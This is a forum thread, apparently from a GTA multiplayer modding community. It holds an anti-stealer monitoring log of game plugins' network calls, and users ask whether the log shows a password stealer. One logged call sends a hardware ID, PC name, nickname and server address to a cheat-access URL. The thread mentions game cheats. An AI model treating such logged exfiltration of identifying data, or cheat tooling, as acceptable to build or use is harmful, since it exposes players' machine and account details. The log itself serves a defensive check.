[WARNING] > [URLDownloadToFileA] > [D:\GTA\MoonLoader.asi] > {szURL: https://blast.hk/moonloader/data/version-info.json | szFileName: C:\Users\user\AppData\Local\Temp\moonloader-version.json}
[WARNING] > [URLDownloadToFileW] > [C:\Windows\syswow64\urlmon.dll] > {szURL: https://blast.hk/moonloader/data/version-info.json | szFileName: C:\Users\user\AppData\Local\Temp\moonloader-version.json}
[WARNING] > [InternetOpenW] > [C:\Windows\syswow64\urlmon.dll] > {lpszAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)}
[WARNING] > [InternetOpenA] > [C:\Windows\syswow64\WININET.dll] > {lpszAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)}
[WARNING] > [InternetConnectW] > [C:\Windows\syswow64\urlmon.dll] > {lpszServerName: blast.hk | lpszUserName: - | lpszPassword: -}
[WARNING] > [HttpOpenRequestW] > [C:\Windows\syswow64\urlmon.dll] > {lpszObjectName: /moonloader/data/version-info.json}
[WARNING] > [InternetCreateUrlA] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: blast.hk}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: blast.hk}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: blast.hk}
[WARNING] > [GetAddrInfoExW] > [C:\Windows\syswow64\WININET.dll] > {pName: blast.hk}
[WARNING] > [gethostbyname] > [D:\GTA\samp.dll] > {name: MICROSOFT-PC}
[WARNING] > [gethostbyname] > [D:\GTA\samp.dll] > {name: 51.83.146.10}
[WARNING] > [gethostbyname] > [D:\GTA\samp.dll] > {name: 51.83.146.10}
[WARNING] > [URLDownloadToFileA] > [D:\GTA\SAMPFUNCS.asi] > {szURL: http://op.bitq.eu/cleo/op-hax/OP-HaX_info.php | szFileName: D:\GTA\OP-HaX_info.php}
[WARNING] > [URLDownloadToFileW] > [C:\Windows\syswow64\urlmon.dll] > {szURL: http://op.bitq.eu/cleo/op-hax/OP-HaX_info.php | szFileName: D:\GTA\OP-HaX_info.php}
[WARNING] > [InternetConnectW] > [C:\Windows\syswow64\urlmon.dll] > {lpszServerName: op.bitq.eu | lpszUserName: - | lpszPassword: -}
[WARNING] > [HttpOpenRequestW] > [C:\Windows\syswow64\urlmon.dll] > {lpszObjectName: /cleo/op-hax/OP-HaX_info.php}
[WARNING] > [InternetCreateUrlA] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: op.bitq.eu}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: op.bitq.eu}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: op.bitq.eu}
[WARNING] > [GetAddrInfoExW] > [C:\Windows\syswow64\WININET.dll] > {pName: op.bitq.eu}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: op.bitq.eu}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: op.bitq.eu}
[PATCHED] > [URLDownloadToFileA] > [D:\GTA\SAMPFUNCS.asi] > {szURL: https://op.bitq.eu/cleo/op-hax/GiveAccses.php?hwid=[START][Date: 3.11.2019, Time: 17:12:51]ID 1281783249, PC: user, Nick: Anhel_Birka, Srv: 51.83.146.10:8888 | szFileName: D:\GTA\giveaccses.php}
> Didn't find my password in here
It won't show a password here anyway; if there's a stealer it'll show which site, the name and so on. Looks clean. What cheat are you using, or what is that d3d9.dll?
 

SNAID

Member
Tell me, is there reason to worry?

Attachments

  • !0AntiStealerByDarkP1xel32.LOG (6.4 KB)